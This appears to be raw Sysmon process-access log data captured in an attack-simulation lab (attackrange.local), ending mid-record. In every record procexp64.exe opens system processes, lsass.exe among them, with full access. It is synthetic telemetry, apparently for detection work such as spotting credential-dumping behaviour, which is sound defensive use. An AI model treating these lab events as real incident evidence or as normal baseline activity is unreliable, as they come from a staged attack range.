10341000x8000000000000000790235Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:41.361{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1300-00000000A301}1200C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790234Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:41.361{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1200-00000000A301}1192C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790233Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:41.361{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1100-00000000A301}1160C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790232Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:41.361{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1000-00000000A301}1152C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790231Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:41.361{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0F00-00000000A301}1120C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790230Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:41.361{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0E00-00000000A301}1076C:\Windows\system32\LogonUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790229Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:41.361{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0D00-00000000A301}624C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790228Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:41.361{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0C00-00000000A301}584C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790227Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:41.361{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790226Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:41.361{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0A00-00000000A301}848C:\Windows\system32\services.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790225Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:41.361{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790224Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:41.361{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0800-00000000A301}720C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790223Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:41.361{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0700-00000000A301}712C:\Windows\system32\wininit.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790222Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:41.361{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1517-600B-0500-00000000A301}640C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790221Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:41.361{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0200-00000000A301}448C:\Windows\System32\smss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790220Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:41.361{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0100-00000000A301}4System0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790455Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:42.392{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3255-6010-D4A2-00000000A301}4024C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790454Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:42.392{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3235-6010-C4A2-00000000A301}4840C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790453Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:42.392{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A3A2-00000000A301}6416C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790452Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:42.392{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A2A2-00000000A301}7260C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790451Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:42.392{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A1-6010-A1A2-00000000A301}6836C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790450Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:42.392{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2A78-6010-96A1-00000000A301}4816C:\Users\Administrator\Downloads\procexp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790449Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:42.392{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DC82-00000000A301}1436C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790448Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:42.392{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DB82-00000000A301}7708C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790447Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:42.392{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2806-600F-D682-00000000A301}6624C:\Windows\explorer.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790446Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:42.392{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1EBE-600B-A206-00000000A301}7468C:\Program Files\Notepad++\notepad++.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790445Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:42.392{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1E06-00000000A301}2936C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790444Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:42.392{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1D06-00000000A301}5472C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790443Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:42.392{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D92-600B-0806-00000000A301}4464C:\Windows\system32\fontdrvhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790442Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:42.392{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0706-00000000A301}7696C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790441Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:42.392{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0606-00000000A301}4952C:\Program Files\Internet Explorer\iexplore.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790440Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:42.392{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A401-00000000A301}5528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790439Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:42.392{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A101-00000000A301}5376C:\Windows\System32\rdpclip.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790438Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:42.392{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E0-600B-9701-00000000A301}2256C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790437Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:42.392{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9501-00000000A301}1036C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790436Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:42.392{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9401-00000000A301}5084C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790435Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:42.392{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A8-600B-E200-00000000A301}4204C:\Windows\System32\msdtc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790434Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:42.392{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A1-600B-DF00-00000000A301}3152C:\Program 